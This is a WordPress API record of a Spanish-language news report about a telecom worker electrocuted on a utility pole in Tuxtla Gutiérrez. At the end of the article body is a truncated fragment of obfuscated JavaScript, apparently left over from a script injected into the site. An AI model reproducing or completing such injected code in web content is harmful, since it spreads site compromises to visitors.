{"id":10520,"date":"2023-06-13T02:56:36","date_gmt":"2023-06-13T02:56:36","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=10520"},"modified":"2023-06-13T02:56:37","modified_gmt":"2023-06-13T02:56:37","slug":"se-electrocuta-empleado-de-empresa-de-telecomunicaciones","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=10520","title":{"rendered":"Se electrocuta empleado de empresa de telecomunicaciones"},"content":{"rendered":"\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"871\" height=\"1024\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/06\/FB_IMG_1686624937696-871x1024.jpg\" alt=\"\" class=\"wp-image-10521\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/06\/FB_IMG_1686624937696-871x1024.jpg 871w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/06\/FB_IMG_1686624937696-255x300.jpg 255w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/06\/FB_IMG_1686624937696-768x903.jpg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/06\/FB_IMG_1686624937696.jpg 1080w\" sizes=\"auto, (max-width: 871px) 100vw, 871px\" \/><\/figure>\n\n\n\n<p>Jairo Camacho.<\/p>\n\n\n\n<p>Agencia ReporteCiudano, 12 de junio del 2023. Tuxtla Guti\u00e9rrez. &#8211; Un empleado de una empresa de telecomunicaciones recibi\u00f3 una descarga el\u00e9ctrica cuando instalaba cableado en la Calle Bugambilia y Lirio del Fraccionamiento FOVISSSTE Jard\u00edn Corona de Tuxtla.<\/p>\n\n\n\n<p>Este hecho ocurri\u00f3 este lunes cuando el hombre de 39 a\u00f1os de edad, realizaba sus labores y subi\u00f3 a un poste de concreto para realizar la instalaci\u00f3n hacia un domicilio particular.<\/p>\n\n\n\n<p>De manera repentina, toc\u00f3 unos cables del transformador de mediana tensi\u00f3n y qued\u00f3 colgado del arn\u00e9s que llevaba.<\/p>\n\n\n\n<p>Al lugar arribaron al lugar para ayudar al empleado de Total Play, que estuvo media hora colgado.<\/p>\n\n\n\n<p>El lesionado fue llevado a un hospital del IMSS, para su atenci\u00f3n m\u00e9dica especializada.<\/p>\n\n\n\n<p>La vialidad se vio interrumpida en el sentido de Norte a Sur.<\/p>\n\n\n\n<p>Hasta el momento se desconoce su estado de salud.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>Jairo Camacho. Agencia ReporteCiudano, 12 de junio del 2023. Tuxtla Guti\u00e9rrez. &#8211; Un empleado de una empresa de telecomunicaciones recibi\u00f3 una descarga el\u00e9ctrica cuando instalaba cableado en la Calle Bugambilia y Lirio del Fraccionamiento FOVISSSTE Jard\u00edn Corona de Tuxtla. Este hecho ocurri\u00f3 este lunes cuando el hombre de 39 a\u00f1os de edad, realizaba sus labores &hellip;<\/p>\n","protected":false},"author":2,"featured_media":10521,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[4],"tags":[],"class_list":["post-10520","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-roja"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/10520","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=10520"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/10520\/revisions"}],"predecessor-version":[{"id":10522,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/10520\/revisions\/10522"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/10521"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=10520"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=10520"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=10520"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}